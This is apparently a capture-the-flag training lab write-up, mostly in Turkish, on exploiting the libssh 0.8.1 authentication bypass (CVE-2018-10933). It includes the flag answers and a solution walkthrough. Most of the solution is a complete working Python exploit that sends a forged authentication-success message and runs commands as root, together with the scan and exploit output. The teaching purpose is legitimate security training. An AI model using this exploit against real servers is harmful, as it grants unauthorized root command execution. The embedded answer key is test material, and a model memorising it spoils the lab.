# Hack SSH Server!

```
GELİŞTİRİCEYE NOTLAR:
- Container docker build -t registry.cyberpath.training/ssh_0_release:v1 . ile build edildi.
- Build Tarihi: 5/8/2022
- Sürüm: v1
```

```
LAB NOTLARI:
- Programs will use for this lab: nmap, metasploit net-tools(ifconfig)
- Non gui required
- Attacker Cli
- Vulnrable libssh 0.8.1

Bu lab libssh 0.8.1 sürümünde bulunan CVE-2018-10933 açığını simüle eder.
```


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta SSH Serverları test etmeniz istendi.  SSH sunucularında libssh çalıştığı bilgisi size verildi. Size attacker makine sağlandı.

libssh, SSH protokolünü kullanan bir program yazmanızı sağlayan bir C kütüphanesidir. Bununla, programları uzaktan yürütebilir, dosya aktarabilir veya uzak programlarınız için güvenli ve şeffaf bir tünel kullanabilirsiniz. SSH protokolü şifrelenir, veri bütünlüğünü sağlar ve hem istemcinin sunucusunun kimliğini doğrulamak için güçlü araçlar sağlar.

**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Zaafiyetli servisi ve CVE ID'sini bulmak.
- Gerekli metasploit modülünü belirlemek.
- Server'ı ele geçirmek.

**Flags**:
- Server'da çalışan servisin ismi ve versiyonu nedir?
    - answer: **libssh 0.8.1**
- Bulduğumuz servise ait CVE numarası nedir?
    - answer: **CVE-2018-10933**
- Nmap vuln taraması bize bir exploit modülü döndürecektir. Exploit modülünü giriniz?
    - answer: **AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS**
- flag.txt?
    - answer: **CyberPath{5wYncNU6Ar7MkthS}**

## **Solution**:

```bash
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 176  bytes 14099 (14.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 111  bytes 111624 (111.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.13 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-20 21:09 UTC
Nmap scan report for libssh_ssh_server_1.libssh_internal_network (10.0.0.13)
Host is up (0.00018s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.8.1 (protocol 2.0)
| vulners:
|   cpe:/a:libssh:libssh:0.8.1:
|       MSF:ILITIES/FREEBSD-CVE-2019-14889/     9.3     https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2019-14889/      *EXPLOIT*
|       CVE-2019-14889  9.3     https://vulners.com/cve/CVE-2019-14889
|       SAINT:B681EA11D39C075AFBC35E972CCFD4F4  6.4     https://vulners.com/saint/SAINT:B681EA11D39C075AFBC35E972CCFD4F4        *EXPLOIT*
|       SAINT:09E7CC2595E83CD15F6B2622D66DE4D4  6.4     https://vulners.com/saint/SAINT:09E7CC2595E83CD15F6B2622D66DE4D4        *EXPLOIT*
|       PACKETSTORM:151477      6.4     https://vulners.com/packetstorm/PACKETSTORM:151477      *EXPLOIT*
|       PACKETSTORM:149865      6.4     https://vulners.com/packetstorm/PACKETSTORM:149865      *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS    6.4     https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS     *EXPLOIT*
|       EDB-ID:46307    6.4     https://vulners.com/exploitdb/EDB-ID:46307      *EXPLOIT*
|       EDB-ID:45638    6.4     https://vulners.com/exploitdb/EDB-ID:45638      *EXPLOIT*
|       CVE-2018-10933  6.4     https://vulners.com/cve/CVE-2018-10933
|       1337DAY-ID-31367        6.4     https://vulners.com/zdt/1337DAY-ID-31367        *EXPLOIT*
|_      CVE-2020-1730   5.0     https://vulners.com/cve/CVE-2020-1730

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

attacker@cyberpath:~$ nano exploit.py
attacker@cyberpath:~$ cat exploit.py
import sys
import paramiko
import socket

s = socket.socket()
s.connect(("10.0.0.13",22))
m = paramiko.message.Message()
t = paramiko.transport.Transport(s)
t.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(m)
c = t.open_session(timeout=5)
c.exec_command(sys.argv[1])
out = c.makefile("rb",2048)
output = out.read()
out.close()
print (output)

attacker@cyberpath:~$ python2 exploit.py id
/home/attacker/.local/lib/python2.7/site-packages/paramiko/transport.py:32: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support
 for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends import default_backend
/home/attacker/.local/lib/python2.7/site-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and veri
fy instead.
  algorithm=hashes.SHA1(),
uid=0(root) gid=0(root) groups=0(root)

attacker@cyberpath:~$ python2 exploit.py "ls -la"/home/attacker/.local/lib/python2.7/site-packages/paramiko/transport.py:32: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support
 for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends import default_backend/home/attacker/.local/lib/python2.7/site-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and veri
fy instead.
  algorithm=hashes.SHA1(),
total 80
drwxr-xr-x   1 root root 4096 Aug 22 07:37 .
drwxr-xr-x   1 root root 4096 Aug 22 07:37 ..
-rwxr-xr-x   1 root root    0 Aug 22 07:37 .dockerenv
drwxr-xr-x   1 root root 4096 Oct 16  2018 bin
drwxr-xr-x   2 root root 4096 Jun 26  2018 boot
drwxr-xr-x   5 root root  340 Aug 22 07:37 dev
drwxr-xr-x   1 root root 4096 Aug 22 07:37 etc
-rw-r--r--   1 root root   28 May  7 19:55 flag.txt
drwxr-xr-x   2 root root 4096 Jun 26  2018 home
drwxr-xr-x   1 root root 4096 Oct 19  2018 lib
drwxr-xr-x   2 root root 4096 Oct 11  2018 lib64
drwxr-xr-x   2 root root 4096 Oct 11  2018 media
drwxr-xr-x   2 root root 4096 Oct 11  2018 mnt
drwxr-xr-x   2 root root 4096 Oct 11  2018 opt
dr-xr-xr-x 222 root root    0 Aug 22 07:37 proc
drwx------   1 root root 4096 Dec 20  2021 root
drwxr-xr-x   3 root root 4096 Oct 11  2018 run
drwxr-xr-x   1 root root 4096 Oct 16  2018 sbin
drwxr-xr-x   2 root root 4096 Oct 11  2018 srv
-rw-r--r--   1 root root  501 Oct 19  2018 ssh_server_fork.patch
dr-xr-xr-x  13 root root    0 Aug 22 07:37 sys
drwxrwxrwt   1 root root 4096 Oct 19  2018 tmp
drwxr-xr-x   1 root root 4096 Oct 11  2018 usr
drwxr-xr-x   1 root root 4096 Oct 11  2018 var

attacker@cyberpath:~$ python2 exploit.py "cat /flag.txt"
/home/attacker/.local/lib/python2.7/site-packages/paramiko/transport.py:32: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends import default_backend
/home/attacker/.local/lib/python2.7/site-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),
CyberPath{5wYncNU6Ar7MkthS}
```
